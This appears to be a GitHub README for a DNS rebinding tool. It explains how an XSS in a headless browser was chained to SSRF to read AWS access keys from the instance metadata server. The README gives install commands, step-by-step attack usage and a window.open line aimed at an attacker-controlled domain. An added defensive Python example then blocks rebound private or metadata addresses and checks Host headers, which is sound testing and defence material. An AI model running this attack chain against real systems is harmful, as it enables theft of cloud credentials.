mdmitry01/dns-rebinding-tool

This tool was originally developed years ago to pentest a company. The target had an XSS vulnerability that was escalated to a Server-Side Request Forgery (SSRF) because the vulnerable webpage was being opened in a headless browser on one of the company's servers. To increase the severity of my vulnerability report, I combined the SSRF with DNS rebinding to access and read AWS access keys from the instance metadata server.

screenshot.png

For a similar case, see this video.

Install and run

sudo systemctl stop systemd-resolved # systemd-resolved uses port 53
npm i
sudo npm start

How to use this tool

  1. Host this tool somewhere with a dedicated static IP address
  2. Buy a domain name and assign the IP address to it. For demonstration purposes, let's assume you bought the domain example.com.
  3. Trigger an XSS vulnerability on a webpage that is opened in a headless web browser on the target server. Use the XSS to open http://sub0.example.com/rebind.html in a new tab of the headless browser using: window.open("http://sub0.example.com/rebind.html", "_blank");
  4. Wait about a minute. You should see Triggered: true on the http://example.com/admin page.
  5. After Triggered: true appears, wait approximately three more minutes. In the Logs section, you should see a response from the AWS metadata server.
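The attack in steps 3 to 5 works only because the headless browser resolves sub0.example.com a second time after the short TTL expires and accepts an answer that now points at the metadata address, and because the metadata service answers a request whose Host header still names the attacker's domain. The following Python is an added example, not part of this repository, showing the two checks a defender would put in place: a client-side guard that rejects any DNS response containing non-public addresses and pins the validated address for the whole request, and a server-side Host header check for internal services. The DNS answers below are constructed; 203.0.113.10 stands in for the tool host's public IP, and the cloud metadata address 169.254.169.254 is the well-known link-local endpoint the README refers to.

```python
import ipaddress

# Address ranges that a public hostname such as sub0.example.com has no business
# resolving to. A rebound answer pointing at one of them (for instance the
# link-local cloud metadata address) is what the attack above depends on.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_blocked(addr: str) -> bool:
    """True if addr is loopback, private, link-local or otherwise non-public."""
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) so the IPv4 rules apply.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def pin_and_validate(hostname: str, answers: list[str]) -> str:
    """Validate one DNS response for hostname and return the single address the
    client must use for the rest of the request.

    The whole response is rejected, not just the offending record: a rebinding
    server can return a public and an internal address together and let the
    browser fall back to the internal one. Connecting to the returned address
    (with hostname in the Host header) instead of resolving again removes the
    re-resolution window that steps 4 and 5 above wait for.
    """
    if not answers:
        raise ValueError(f"{hostname}: empty DNS response")
    bad = [a for a in answers if is_blocked(a)]
    if bad:
        raise ValueError(f"{hostname}: refusing non-public answers {bad}")
    return answers[0]


def host_header_allowed(host_header: str, own_names: set[str]) -> bool:
    """Server-side check for an internal service: accept a request only if the
    Host header names this service. A rebound request still carries the
    attacker's hostname (Host: sub0.example.com), so it is rejected here even
    though the TCP connection arrived on the internal address. own_names holds
    lowercase hostnames or IP literals without port."""
    host = host_header.strip().lower()
    if host.startswith("["):            # bracketed IPv6 literal, optional port
        host = host[1:host.index("]")]
    elif host.count(":") == 1:          # name:port or IPv4:port
        host = host.split(":", 1)[0]
    return host in own_names


if __name__ == "__main__":
    # Constructed DNS answers: the first lookup (public) and the rebound lookup.
    first_lookup = ["203.0.113.10"]
    rebound_lookup = ["203.0.113.10", "169.254.169.254"]
    print(pin_and_validate("sub0.example.com", first_lookup))
    try:
        pin_and_validate("sub0.example.com", rebound_lookup)
    except ValueError as err:
        print("blocked:", err)
    print(host_header_allowed("sub0.example.com", {"169.254.169.254"}))
```

On the client side this is the logic a DNS forwarder with rebind protection or an SSRF-aware HTTP client applies; on the server side it is the reason a metadata-style service should compare the Host header against its own address rather than trust whatever the browser sends.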

About

A tool for DNS rebinding-based SSRF attacks
